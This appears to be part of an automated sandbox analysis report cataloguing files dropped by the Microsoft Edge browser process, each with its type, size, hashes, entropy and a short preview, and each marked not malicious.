                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f..................b................next-map-id.1.Cnamespace-9920fe2f_9b67_4c42_b599_68f029b31447-https://ntp.msn.com/.0J../8................map-0-shd_sweeper..{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.a.d.s.-.c.e.l.e.b.c.b.v.4.-.c.,.1.s.-.p.n.p.f.e.d.l.o.c.,.p.n.p.w.x.e.x.p.i.r.e.-.c.,.b.i.n.g._.v.2._.s.c.o.p.e.-.c.,.p.r.g.-.1.s.w.-.s.a.n.t.f.-.l.n.r.m.t.,.p.r.g.-.1.s.w.-.s.a.-.c.a.p.c.o.n.f.2.t.2.,.p.r.g.-.1.s.w.-.s.a.-.s.p.7.-.t.2.,.t.r.a.f.f.i.c.-.p.1.-.n.y.l.d.-.t.,.p.r.g.-.1.s.w.-.l.d.n.y.-.t.r.a.n.s.i.t.,.p.r.g.-.1.s.w.-.t.r.a.n.-.t.r.d.,.p.r.g.-.f.i.n.-.c.l.e.f.t.r.a.,.r.o.u.t.e.g.r.a.p.h.e.x.p.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                  Entropy (8bit):5.178785099885535
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/hVq2Pwkn23oH+TcwtrQMxIFUtN9F0gZmwzE7VSIkwOwkn23oH+TcwtrQMFLJ:7/bvYfYebCFUtNn9/za75JfYebtJ
                                                                                                                                                                  MD5:9031FB98A84B65E2A17299CDB313985C
                                                                                                                                                                  SHA1:4D3B4EAC90022C137E80E0F5C6374956F5D251E0
                                                                                                                                                                  SHA-256:F523C5341C89027C0934FEA858367728E0255871D9B21FD7A28871AD48D7F18F
                                                                                                                                                                  SHA-512:79F6D6E30C82BFEC3E88A5B97C306C3FBBA2AE9653AE21C3E0E4A62F82080123202F7427CA21050D95C7608F4B710B8EEB4DA03FAF6FFA8B0CBFD91FEE646858
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.858 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/06-17:17:54.859 1870 Recovering log #3.2025/01/06-17:17:54.861 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1443
                                                                                                                                                                  Entropy (8bit):3.7485158954188966
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:3olLikfdpsAF4unxEtLp3X2amEtG1Chq6ysuCFclkQKkOAM4:3olLRVzFiLp2FEkChCsV+lFHOp
                                                                                                                                                                  MD5:5CBC363EE54F583ADB90BC8C9E0F8F55
                                                                                                                                                                  SHA1:FCB86C1E17E1327B225DFE60F5B8477B8EE3465B
                                                                                                                                                                  SHA-256:7A07F3B911E0EBCBEDB79DAF6D5EBBF77F7F56A138E4E28D993EEBCD31827F4A
                                                                                                                                                                  SHA-512:954B2C2C3D5F82216322FA49BB8B7AF2963CDE732F28A07965EFD5EA8F8C6C517FD77D1857932D3571E3CC18FEB6376E2205458001C0ABC9BB50E52E00435D8F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SNSS.........z..............z......."..z..............z..........z..........z..........z.....!....z..................................z...z.1..,.....z.$...9920fe2f_9b67_4c42_b599_68f029b31447.....z..........z.....3^...........z......z..........................z.....................5..0.....z.&...{1A5CCF63-1000-409F-B5C1-AFEC7F75D4D9}.......z..........z.............................z..............z.........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........2..+....2..+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3...
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):350
                                                                                                                                                                  Entropy (8bit):5.138458582630739
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/wq2Pwkn23oH+Tcwt7Uh2ghZIFUtNRZmwzEzkwOwkn23oH+Tcwt7Uh2gnLJ:7/wvYfYebIhHh2FUtNR/zEz5JfYebIh9
                                                                                                                                                                  MD5:1BF3F7DA4D4F8D63567ED74138253AD1
                                                                                                                                                                  SHA1:B011852B12DCDEAA2A4F0C4FB3D29961D564944B
                                                                                                                                                                  SHA-256:A2C11DC8EF11D10331230C1D99824EC5A6AAE750C8C2247F3BCC9D7E7CAEF7E5
                                                                                                                                                                  SHA-512:C0D0A490758E295C0AC01E9E84324D8EC1AD6DED3ED7BFB69968B0F201AFF351952905A3E88CA740400844427D094E1DD683DACB0F0773194DC3F134CE7C6FA8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.355 1ec0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/06-17:17:54.355 1ec0 Recovering log #3.2025/01/06-17:17:54.356 1ec0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):524656
                                                                                                                                                                  Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Lsulls+l:LsWsa
                                                                                                                                                                  MD5:83CFC9624DC412C0D9B4587088EF61CC
                                                                                                                                                                  SHA1:F1606863D8851388F2212B35622453655979A36F
                                                                                                                                                                  SHA-256:A3A1D766E29620BC344FD542F31AE5C086258B9A1F3D5EFD46BE1AFD5B400DC8
                                                                                                                                                                  SHA-512:9B808F8A753173F4263EC24378D89305272C5B4BBB1BBDD591C98CFA433610DBAD17EB2484670F59FF780DF099E7E4B3436805C57BD036E56DFE1B3B90557BBB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsNlotCrll:Ls3otCxl
                                                                                                                                                                  MD5:05A6ED02C2C90DA8DCCC3C92642BB5E2
                                                                                                                                                                  SHA1:40E4D598DB58923DBB408C510184082088E06C34
                                                                                                                                                                  SHA-256:A8E978491CF90CCAF3685BD277A777CDBE53E6D89A09C904DFA07EBC10CFA4F8
                                                                                                                                                                  SHA-512:18C4D9327857FD86C82AF152EE2E0FDBA94BC2474177F6B506E454AE73ED714E3AF161BE3D74C0F1F17A2E78E5F990EFFEFEE0A270BF6017F4293EA80B02F0CC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                  Entropy (8bit):5.261342921880708
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:7/MVvYfYebvqBQFUtNMH/zMo5JfYebvqBvJ:7/M5YfYebvZgNMbMyJfYebvk
                                                                                                                                                                  MD5:2FB344C5DFBAEFB6CF44A4DDD3C6018E
                                                                                                                                                                  SHA1:5F653243D725153B962917B7D89B823E38188B32
                                                                                                                                                                  SHA-256:C3BB30DAFD0AEA0C1FDC3EFAD48150946B6C142582ED127482549D7A70747CFD
                                                                                                                                                                  SHA-512:C61296A69F17DB7501E3618FF4B9050B68FD780BF72A8376BB625B5989DE647537B12168A455B03A02E5611AD43D65A9B4D06D95FFEDFD7D40603435EB322EF1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:55.472 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:17:55.473 1870 Recovering log #3.2025/01/06-17:17:55.520 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                  Entropy (8bit):5.261342921880708
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:7/MVvYfYebvqBQFUtNMH/zMo5JfYebvqBvJ:7/M5YfYebvZgNMbMyJfYebvk
                                                                                                                                                                  MD5:2FB344C5DFBAEFB6CF44A4DDD3C6018E
                                                                                                                                                                  SHA1:5F653243D725153B962917B7D89B823E38188B32
                                                                                                                                                                  SHA-256:C3BB30DAFD0AEA0C1FDC3EFAD48150946B6C142582ED127482549D7A70747CFD
                                                                                                                                                                  SHA-512:C61296A69F17DB7501E3618FF4B9050B68FD780BF72A8376BB625B5989DE647537B12168A455B03A02E5611AD43D65A9B4D06D95FFEDFD7D40603435EB322EF1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:55.472 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:17:55.473 1870 Recovering log #3.2025/01/06-17:17:55.520 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                  MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                  SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                  SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                  SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):193
                                                                                                                                                                  Entropy (8bit):4.864047146590611
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                  MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                  SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                  SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                  SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):193
                                                                                                                                                                  Entropy (8bit):4.864047146590611
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                  MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                  SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                  SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                  SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                  Entropy (8bit):0.555790634850688
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                                  MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                                  SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                                  SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                                  SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
